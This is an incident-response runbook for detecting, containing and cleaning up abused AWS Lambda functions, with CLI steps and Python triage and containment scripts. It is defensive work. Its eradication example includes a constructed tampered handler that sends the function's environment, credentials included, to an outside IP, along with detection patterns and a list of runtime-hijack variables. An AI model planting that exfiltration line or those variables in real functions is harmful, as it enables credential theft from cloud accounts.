Severity: HIGH | Category: Malware | Containment time: 20-30 min | 15 steps across 5 phases

    Lambda Function Abuse

    A Lambda function is executing malicious code: either a function was modified to include a backdoor, a new malicious function was deployed, or an existing function is being invoked with crafted payloads to exploit a vulnerability in its code or dependencies. Lambda abuse can lead to credential theft (the execution role's temporary credentials are handed to the function as environment variables and are valid from anywhere on the internet), data exfiltration, or crypto mining.

    Phase 1: Detection

    Step 1: Check CloudTrail for suspicious Lambda operations

    Look for unauthorized function creation, code updates, or configuration changes. Two things to know before querying: Lambda's CloudTrail eventName values carry an API-version suffix (UpdateFunctionCode20150331v2, CreateFunction20150331, and so on) and lookup-events matches EventName exactly, so the bare API name returns nothing; and lookup-events only searches management events from the last 90 days in the current region, so run it in every region the account uses, or query the CloudTrail archive in S3 with Athena for older or multi-account history. When you do not yet know which API was used, AttributeKey=EventSource with AttributeValue=lambda.amazonaws.com pulls every Lambda management event in one query.

    aws cloudtrail lookup-events \
      --lookup-attributes AttributeKey=EventName,AttributeValue=UpdateFunctionCode20150331v2 \
      --start-time <incident-start>
    aws cloudtrail lookup-events \
      --lookup-attributes AttributeKey=EventName,AttributeValue=CreateFunction20150331 \
      --start-time <incident-start>

    CloudTrail events to review (each logged with its version suffix): CreateFunction, UpdateFunctionCode, UpdateFunctionConfiguration, AddPermission, CreateEventSourceMapping
    Step 2: Review CloudWatch Logs for the function

    Check Lambda execution logs for unexpected behavior. The log group only contains what the runtime and the function itself write (START/END/REPORT lines plus the handler's own output), so filter for more than ERROR: log lines the handler never produced, unfamiliar hostnames or IP addresses, and REPORT lines whose Duration or Init Duration jumped. Outbound connections are not logged by Lambda itself; for VPC-attached functions use VPC Flow Logs, otherwise GuardDuty Lambda Protection (network activity monitoring) is the source for that.

    aws logs filter-log-events \
      --log-group-name "/aws/lambda/<function-name>" \
      --start-time <epoch-ms> \
      --filter-pattern "ERROR"
    Step 3: Check for unusual invocation patterns

    Review Lambda metrics for unexpected spikes in invocation count, duration, or concurrent executions.

    aws cloudwatch get-metric-statistics \
      --namespace AWS/Lambda \
      --metric-name Invocations \
      --dimensions Name=FunctionName,Value=<function-name> \
      --start-time <24h-ago> --end-time <now> \
      --period 3600 --statistics Sum
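    The CloudTrail side of the detection steps above, as an added example that is not part of this runbook: a Python triage pass over CloudTrail records that strips Lambda's API-version suffix from event names, keeps only the change events listed in step 1, and flags those made by an unexpected principal, from an unexpected network, or granting invoke rights to the world. The deploy role, trusted network range, account ID and sample records are constructed for the example.

```python
"""Triage CloudTrail records for Lambda tampering (added example, not from the runbook).
Input is the JSON from lookup-events' CloudTrailEvent field or the Records[] of a
CloudTrail S3 object. The deploy role, network range and records below are constructed.
"""
import ipaddress
import re

# Lambda's eventName values carry an API-version suffix (UpdateFunctionCode20150331v2,
# CreateFunction20150331, ...). Strip it so the rules can use the plain API name.
VERSION_SUFFIX = re.compile(r"\d{8}(v\d+)?$")

# Management events that change what a function runs, who can invoke it, or its guardrails.
HIGH_RISK = {
    "CreateFunction", "UpdateFunctionCode", "UpdateFunctionConfiguration", "AddPermission",
    "CreateEventSourceMapping", "UpdateEventSourceMapping", "CreateFunctionUrlConfig",
    "UpdateFunctionUrlConfig", "PublishLayerVersion", "DeleteFunctionCodeSigningConfig",
    "PutFunctionConcurrency", "DeleteFunctionConcurrency",
}


def base_event_name(event_name: str) -> str:
    return VERSION_SUFFIX.sub("", event_name)


def actor_of(identity: dict) -> str:
    """For assumed-role sessions report the role, not the per-run session ARN."""
    issuer = identity.get("sessionContext", {}).get("sessionIssuer", {})
    return issuer.get("arn") or identity.get("arn") or identity.get("principalId", "?")


def triage(records, trusted_principals, trusted_cidrs):
    """One finding per high-risk Lambda change that is not clearly legitimate."""
    nets = [ipaddress.ip_network(c) for c in trusted_cidrs]
    findings = []
    for rec in records:
        name = base_event_name(rec.get("eventName", ""))
        if rec.get("eventSource") != "lambda.amazonaws.com" or name not in HIGH_RISK:
            continue
        identity = rec.get("userIdentity", {})
        actor = actor_of(identity)
        params = rec.get("requestParameters") or {}
        reasons = []

        # Who and from where: deploys should come from the pipeline role on known networks.
        if actor not in trusted_principals:
            reasons.append(f"untrusted principal {actor}")
        src = rec.get("sourceIPAddress", "")
        if not src.endswith(".amazonaws.com"):  # calls made by AWS services on your behalf
            try:
                if not any(ipaddress.ip_address(src) in n for n in nets):
                    reasons.append(f"source IP {src} outside trusted ranges")
            except ValueError:
                reasons.append(f"unparseable source {src!r}")
        if identity.get("accountId") not in (None, rec.get("recipientAccountId")):
            reasons.append("cross-account caller")

        # What: resource-policy grants to the world or to foreign accounts.
        if name == "AddPermission":
            principal = str(params.get("principal", ""))
            if principal == "*":
                reasons.append("invoke permission granted to Principal *")
            elif principal.isdigit() and principal != rec.get("recipientAccountId"):
                reasons.append(f"invoke permission granted to account {principal}")

        # Denied attempts show what was tried before something succeeded.
        if rec.get("errorCode"):
            reasons.append(f"failed with {rec['errorCode']}")

        if reasons:
            findings.append({"time": rec.get("eventTime"), "event": name, "actor": actor,
                             "function": params.get("functionName"), "reasons": reasons})
    return findings


# --- constructed sample data (not real CloudTrail output) ---------------------
ACCOUNT = "123456789012"
DEPLOY_ROLE = f"arn:aws:iam::{ACCOUNT}:role/deploy-pipeline"   # assumed CI role
TRUSTED_CIDRS = ["10.0.0.0/8"]                                 # assumed build network
CI = {"type": "AssumedRole", "accountId": ACCOUNT,
      "arn": f"arn:aws:sts::{ACCOUNT}:assumed-role/deploy-pipeline/build-4711",
      "sessionContext": {"sessionIssuer": {"arn": DEPLOY_ROLE}}}
DEV = {"type": "IAMUser", "accountId": ACCOUNT, "arn": f"arn:aws:iam::{ACCOUNT}:user/dev-laptop"}


def _record(time, name, identity, ip, params):
    return {"eventTime": time, "eventSource": "lambda.amazonaws.com", "eventName": name,
            "recipientAccountId": ACCOUNT, "userIdentity": identity,
            "sourceIPAddress": ip, "requestParameters": params}


SAMPLE_RECORDS = [
    _record("2024-05-01T10:00:00Z", "UpdateFunctionCode20150331v2", CI, "10.20.30.40",
            {"functionName": "orders-api"}),
    _record("2024-05-01T02:13:07Z", "UpdateFunctionCode20150331v2", DEV, "198.51.100.23",
            {"functionName": "orders-api"}),
    _record("2024-05-01T02:14:30Z", "AddPermission20150331v2", DEV, "198.51.100.23",
            {"functionName": "orders-api", "statementId": "public",
             "action": "lambda:InvokeFunction", "principal": "*"}),
    _record("2024-05-01T02:15:00Z", "GetFunction20150331v2", DEV, "198.51.100.23",
            {"functionName": "orders-api"}),
]
```

    Run it as `triage(records, {DEPLOY_ROLE}, TRUSTED_CIDRS)` over the parsed CloudTrailEvent payloads; on the sample set the CI deploy is silent, the GetFunction read is ignored, and the two out-of-hours changes from the IAM user are returned with their reasons. The role ARN is matched through sessionIssuer rather than the session ARN because the session name changes on every pipeline run.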

    Phase 2: Containment

    Step 1: Disable the function by setting concurrency to zero

    Setting reserved concurrency to 0 prevents any new invocations without deleting the function.

    aws lambda put-function-concurrency \
      --function-name <function-name> \
      --reserved-concurrent-executions 0

    This is the safest way to stop a Lambda function: new invocations are throttled while the code, configuration and log group stay intact for forensics. Two caveats: executions already running continue until they return or hit the function timeout (up to 15 minutes), and throttled asynchronous invocations are retried for up to six hours before landing in the function's dead-letter queue or on-failure destination, so those queues may hold the attacker's payloads and should be preserved rather than purged. Anyone with lambda:PutFunctionConcurrency or lambda:DeleteFunctionConcurrency can undo this, so watch CloudTrail for those events on the function while containment is in progress.

    Step 2: Remove event source triggers

    Event source mappings are the poll-based triggers (SQS, DynamoDB Streams, Kinesis, Kafka); disabling them stops Lambda's pollers from consuming and retrying records. Push-based triggers (API Gateway, S3, EventBridge, SNS, function URLs) are authorized by the function's resource-based policy instead, which get-policy shows; record it as evidence before changing anything, since reserved concurrency 0 already throttles those invocations.

    aws lambda list-event-source-mappings \
      --function-name <function-name>
    aws lambda update-event-source-mapping \
      --uuid <mapping-uuid> \
      --enabled false
    Step 3: Restrict the execution role

    Attach a deny-all inline policy to the Lambda execution role to prevent any further API calls. IAM evaluates the role's policies on every request, so the Deny also neutralizes temporary credentials the attacker has already copied out of the function's environment, without waiting for them to expire. Check first whether other functions (or anything else) share this role: they lose every permission too, including writing to CloudWatch Logs, which is one reason execution roles should not be shared (see Phase 5).

    aws iam put-role-policy \
      --role-name <lambda-execution-role> \
      --policy-name DenyAll-IncidentResponse \
      --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Deny","Action":"*","Resource":"*"}]}'
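    The three containment steps as one boto3 script, an added example rather than code from this runbook. It throttles the function, disables every enabled event source mapping (paginated), records the resource-policy grants that push triggers rely on, warns when the execution role is shared with other functions, and attaches the deny-all policy. boto3, the function name and the sample resource policy are assumptions; the helpers and the sample run without boto3 installed.

```python
"""Containment of a compromised Lambda function as boto3 calls (added example, not
code from this runbook). Assumes boto3 plus credentials with lambda:* on the function
and iam:PutRolePolicy on its role; boto3 is imported inside contain() so the helpers
and the constructed sample policy work without it. Names are placeholders.
"""
import json

DENY_ALL_POLICY_NAME = "DenyAll-IncidentResponse"


def deny_all_policy() -> dict:
    """Inline policy for the execution role. IAM evaluates it on every request, so it also
    blocks temporary credentials the attacker already copied out of the function."""
    return {"Version": "2012-10-17",
            "Statement": [{"Effect": "Deny", "Action": "*", "Resource": "*"}]}


def role_name_from_arn(role_arn: str) -> str:
    """arn:aws:iam::123456789012:role/service-role/orders-api-role -> orders-api-role"""
    resource = role_arn.split(":", 5)[5]
    if not resource.startswith("role/"):
        raise ValueError(f"not a role ARN: {role_arn}")
    return resource.rsplit("/", 1)[1]


def invoke_grants(resource_policy: str) -> list:
    """Summarise GetPolicy output: each statement is a push trigger (S3, API Gateway,
    EventBridge, function URL) or an external caller allowed to invoke the function."""
    grants = []
    for st in json.loads(resource_policy).get("Statement", []):
        principal = st.get("Principal", "*")
        if isinstance(principal, dict):
            principal = principal.get("Service") or principal.get("AWS")
        cond = st.get("Condition", {})
        grants.append({
            "sid": st.get("Sid"), "principal": principal,
            "source": (cond.get("ArnLike", {}).get("AWS:SourceArn")
                       or cond.get("StringEquals", {}).get("AWS:SourceAccount")),
            "url_auth": cond.get("StringEquals", {}).get("lambda:FunctionUrlAuthType"),
        })
    return grants


def contain(function_name: str, dry_run: bool = True) -> list:
    """Run the three containment steps in order; returns what was (or would be) done."""
    import boto3
    lam, iam = boto3.client("lambda"), boto3.client("iam")
    actions = []

    def do(description, call, **kwargs):
        actions.append(description)
        if not dry_run:
            call(**kwargs)

    cfg = lam.get_function_configuration(FunctionName=function_name)

    # 1. Throttle every new invocation; code, config and logs stay intact for forensics.
    do(f"reserve 0 concurrency for {function_name}", lam.put_function_concurrency,
       FunctionName=function_name, ReservedConcurrentExecutions=0)

    # 2. Stop poll-based sources from pulling records. Push triggers live in the resource
    #    policy and are already throttled by step 1, so they are only recorded here.
    pages = lam.get_paginator("list_event_source_mappings").paginate(FunctionName=function_name)
    for m in (m for page in pages for m in page["EventSourceMappings"]):
        if m["State"] not in ("Disabled", "Disabling"):
            do(f"disable mapping {m['UUID']} ({m.get('EventSourceArn', 'self-managed')})",
               lam.update_event_source_mapping, UUID=m["UUID"], Enabled=False)
    try:
        for g in invoke_grants(lam.get_policy(FunctionName=function_name)["Policy"]):
            actions.append(f"invoke grant {g['sid']}: {g['principal']} via {g['source']}")
    except lam.exceptions.ResourceNotFoundException:
        pass  # no resource-based policy, so no push triggers

    # 3. Deny everything to the execution role; warn when other functions share it.
    role = role_name_from_arn(cfg["Role"])
    sharers = [f["FunctionName"] for page in lam.get_paginator("list_functions").paginate()
               for f in page["Functions"]
               if f["Role"] == cfg["Role"] and f["FunctionName"] != cfg["FunctionName"]]
    if sharers:
        actions.append(f"WARNING: role {role} is shared with {sharers}; they lose access too")
    do(f"attach {DENY_ALL_POLICY_NAME} to role {role}", iam.put_role_policy,
       RoleName=role, PolicyName=DENY_ALL_POLICY_NAME,
       PolicyDocument=json.dumps(deny_all_policy()))
    return actions


SAMPLE_RESOURCE_POLICY = json.dumps({  # constructed GetPolicy output for the example
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "s3-upload-trigger", "Effect": "Allow", "Action": "lambda:InvokeFunction",
         "Principal": {"Service": "s3.amazonaws.com"},
         "Resource": "arn:aws:lambda:us-east-1:123456789012:function:orders-api",
         "Condition": {"ArnLike": {"AWS:SourceArn": "arn:aws:s3:::orders-uploads"}}},
        {"Sid": "public", "Effect": "Allow", "Action": "lambda:InvokeFunctionUrl",
         "Principal": "*",
         "Resource": "arn:aws:lambda:us-east-1:123456789012:function:orders-api",
         "Condition": {"StringEquals": {"lambda:FunctionUrlAuthType": "NONE"}}},
    ],
})
```

    `contain("orders-api")` performs only read calls and prints the plan; `contain("orders-api", dry_run=False)` applies it. The deny policy is written last on purpose: once it is in place the function can no longer write its own logs, so the throttle and mapping changes are done while the role still works. The sample resource policy shows the two grant shapes worth spotting in real output: a service principal scoped by SourceArn, and a Principal "*" statement for a function URL with AuthType NONE.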

    Phase 3: Eradication

    Step 1: Download and analyze the function code

    Download the deployment package to analyze for malicious modifications. Code.Location is a pre-signed S3 URL that expires after a few minutes, so fetch it immediately; container-image functions have an ImageUri instead, and the image digest in ECR is the artifact to pull. Keep Configuration.CodeSha256 and LastModified from the same get-function output: CodeSha256 is the base64-encoded SHA-256 of the zip, so comparing it with the hash of the artifact your pipeline built from the expected commit tells you whether the package was swapped. Do the same for each layer version the function uses (get-layer-version), since code can be injected there without touching the function package.

    aws lambda get-function --function-name <function-name> \
      --query 'Code.Location' --output text | xargs curl -o function-code.zip
    Step 2: Check for environment variable tampering

    Attackers may inject values into environment variables that the runtime honors before the handler runs: AWS_LAMBDA_EXEC_WRAPPER (a script executed before the runtime starts), NODE_OPTIONS (--require), PYTHONPATH, LD_PRELOAD and similar. Compare the deployed variables against the values in source control, and check the Layers list from the same output for layer ARNs owned by accounts you do not control. Treat any secrets stored in variables as compromised, since the function's code could read them.

    aws lambda get-function-configuration \
      --function-name <function-name> \
      --query 'Environment.Variables'
    Step 3: Delete unauthorized functions

    Remove any Lambda functions that were created by the attacker. Preserve evidence first: download the package and configuration as in step 1, record the CreateFunction CloudTrail event (it names the principal and source IP), and keep the function's CloudWatch log group, which delete-function does not remove. Also remove event source mappings, function URLs and resource-policy statements the attacker added to legitimate functions.

    aws lambda delete-function --function-name <malicious-function>
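    The analysis behind eradication steps 1 and 2, as an added example that is not code from this runbook: it checks get-function-configuration output for runtime-hijack variables, drift from the source-controlled baseline and layers from foreign accounts, verifies the deployed CodeSha256 against a trusted build, and pattern-scans the downloaded package. The handler sources, baseline, and configuration are constructed for the example; the variable list and regexes are a starting point, not a complete malware detector.

```python
"""Check a Lambda function's configuration and deployment package for tampering
(added example, not code from the runbook). `config` is get-function-configuration
output; the trusted package is the artifact your pipeline built from the expected
commit. The sample config, baseline and handler sources below are constructed.
"""
import base64
import hashlib
import io
import re
import zipfile

# Variables the runtime or language honours before the handler runs: a value here can
# execute attacker code without any change to the package.
RUNTIME_HIJACK_VARS = {
    "AWS_LAMBDA_EXEC_WRAPPER",         # script run before the runtime starts
    "LD_PRELOAD", "LD_LIBRARY_PATH",   # native library injection
    "PYTHONPATH", "NODE_OPTIONS",      # e.g. NODE_OPTIONS=--require /opt/x.js
    "JAVA_TOOL_OPTIONS", "DOTNET_STARTUP_HOOKS", "RUBYOPT",
}

SUSPICIOUS = [  # cheap first-pass patterns for source files inside the package
    (re.compile(rb"os\.environ|AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN"),
     "reads environment (holds role credentials)"),
    (re.compile(rb"https?://(?![\w.-]*amazonaws\.com)[\w./:-]+"), "non-AWS URL"),
    (re.compile(rb"urllib\.request|requests\.(post|put)|socket\.socket\(|http\.client"),
     "outbound network"),
    (re.compile(rb"\bexec\(|\beval\(|b64decode\(|marshal\.loads\("), "dynamic or encoded code"),
]


def check_environment(config: dict, baseline: dict) -> list:
    """Compare deployed variables with the values kept in source control."""
    env = config.get("Environment", {}).get("Variables", {})
    findings = []
    for key in sorted(env):
        if key in RUNTIME_HIJACK_VARS:
            findings.append(f"runtime hijack variable {key}={env[key]}")
        elif key not in baseline:
            findings.append(f"unexpected variable {key}")
        elif env[key] != baseline[key]:
            findings.append(f"changed variable {key}: {baseline[key]!r} -> {env[key]!r}")
    findings += [f"missing variable {k}" for k in sorted(set(baseline) - set(env))]
    return findings


def foreign_layers(config: dict, trusted_accounts=()) -> list:
    """Layers from other accounts load before the handler. AWS-published layers (e.g.
    Lambda Insights) come from AWS accounts, so pass those as trusted."""
    own = config["FunctionArn"].split(":")[4]
    return [layer["Arn"] for layer in config.get("Layers", [])
            if layer["Arn"].split(":")[4] not in (own, *trusted_accounts)]


def code_sha256(package: bytes) -> str:
    """Lambda's CodeSha256 is the base64-encoded SHA-256 of the zip archive."""
    return base64.b64encode(hashlib.sha256(package).digest()).decode()


def package_matches(config: dict, trusted_package: bytes) -> bool:
    return config["CodeSha256"] == code_sha256(trusted_package)


def scan_package(package: bytes) -> list:
    """Pattern-scan source files in the downloaded deployment package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for info in zf.infolist():
            if info.filename.endswith((".py", ".js", ".mjs", ".sh")):
                data = zf.read(info)
                findings += [(info.filename, why) for pat, why in SUSPICIOUS if pat.search(data)]
    return findings


def build_zip(files: dict) -> bytes:
    """Deterministic zip (fixed timestamps) so the hash is reproducible across builds."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name in sorted(files):
            zf.writestr(zipfile.ZipInfo(name, date_time=(2024, 1, 1, 0, 0, 0)), files[name])
    return buf.getvalue()


# --- constructed sample data ---------------------------------------------------
TRUSTED_SOURCE = {"handler.py": (
    "import json\n\n"
    "def handler(event, context):\n"
    "    return {'statusCode': 200, 'body': json.dumps(event)}\n")}
TAMPERED_SOURCE = {"handler.py": TRUSTED_SOURCE["handler.py"] + (
    "\nimport os, urllib.request\n"
    "urllib.request.urlopen('https://203.0.113.10/c', data=str(dict(os.environ)).encode())\n")}
BASELINE_ENV = {"TABLE_NAME": "orders", "LOG_LEVEL": "INFO"}
SAMPLE_CONFIG = {  # shape of get-function-configuration output, values constructed
    "FunctionArn": "arn:aws:lambda:us-east-1:123456789012:function:orders-api",
    "CodeSha256": code_sha256(build_zip(TAMPERED_SOURCE)),
    "Environment": {"Variables": {"TABLE_NAME": "orders", "LOG_LEVEL": "DEBUG",
                                  "AWS_LAMBDA_EXEC_WRAPPER": "/opt/wrap.sh"}},
    "Layers": [{"Arn": "arn:aws:lambda:us-east-1:999999999999:layer:helper:3"}],
}
```

    On the sample, check_environment reports the wrapper variable and the LOG_LEVEL drift, foreign_layers returns the layer from account 999999999999, package_matches is False against the trusted build (the deployed hash is the tampered one), and scan_package flags the appended exfiltration line three times. In a real case, replace the constructed SAMPLE_CONFIG with the parsed CLI output and build_zip(TRUSTED_SOURCE) with the artifact from your pipeline; the hash comparison is the decisive check, the pattern scan only tells you where to start reading.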

    Phase 4: Recovery

    Step 1: Redeploy the function from a trusted source

    Deploy the function code from your version control system (Git), not from the AWS copy, which may be tampered with. Build it through the normal pipeline, publish a numbered version and point aliases at it so that what gets invoked is immutable, and confirm that the deployed CodeSha256 equals the hash of the artifact you built. Restore environment variables and layers from source control as well, not from the current configuration.

    Step 2: Rotate the execution role credentials

    An execution role has no long-lived keys; what the attacker holds are temporary credentials that stay valid until they expire. Either delete and re-create the role under a new name and update the function to use it, or replace the deny-all policy with one that denies every action when aws:TokenIssueTime is earlier than the containment time (the policy the IAM console's "Revoke active sessions" action attaches). Sessions issued before that moment are rejected, while the redeployed function obtains fresh credentials and works normally.

    Step 3: Re-enable the function with monitoring

    delete-function-concurrency removes the reserved concurrency setting and returns the function to the account's unreserved pool; if the function previously had a specific reserved value, set that instead. Remove the DenyAll-IncidentResponse inline policy from the role first (unless a new role is in place). Then watch the Invocations, Errors and Throttles metrics, the function's log group and GuardDuty findings closely for the next 48 hours, and alert on any further CreateFunction, UpdateFunctionCode or UpdateFunctionConfiguration events for it.

    aws lambda delete-function-concurrency --function-name <function-name>

    Phase 5: Lessons Learned

    Step 1: Implement code signing for Lambda

    Use AWS Signer to create a signing profile (platform AWSLambda-SHA384-ECDSA) and attach a code signing configuration with UntrustedArtifactOnDeployment set to Enforce to each function. Lambda then rejects UpdateFunctionCode, and layer versions, whose packages are not signed by an allowed profile, which blocks the tampering in this scenario at the API. Code signing covers .zip deployment packages; for container images, verify and pin the image digest in your pipeline instead. Treat lambda:DeleteFunctionCodeSigningConfig and lambda:PutFunctionCodeSigningConfig as privileged actions.

    Step 2: Apply least-privilege to execution roles

    Each Lambda function should have its own execution role with only the permissions it needs, scoped to specific resource ARNs. Never reuse roles across functions: a shared role gives one compromised function every other function's permissions, and it makes the deny-all containment above disruptive. Keep lambda:UpdateFunctionCode, lambda:UpdateFunctionConfiguration, iam:PassRole and sts:AssumeRole out of execution roles unless a function genuinely needs them; those are what let a compromised function spread.

    Step 3: Enable Lambda function URL auth and resource policies

    If using function URLs, set AuthType to AWS_IAM. AuthType NONE requires a resource-policy statement granting lambda:InvokeFunctionUrl to Principal "*", which makes the function reachable by anyone on the internet and is exactly the AddPermission pattern detection step 1 looks for. Review every function's resource-based policy for wildcard or cross-account principals, and constrain service principals with SourceArn or SourceAccount conditions so that only the intended bucket, API or event bus can invoke the function.

    Tags: lambda, serverless, code-injection, execution-role, exfiltration
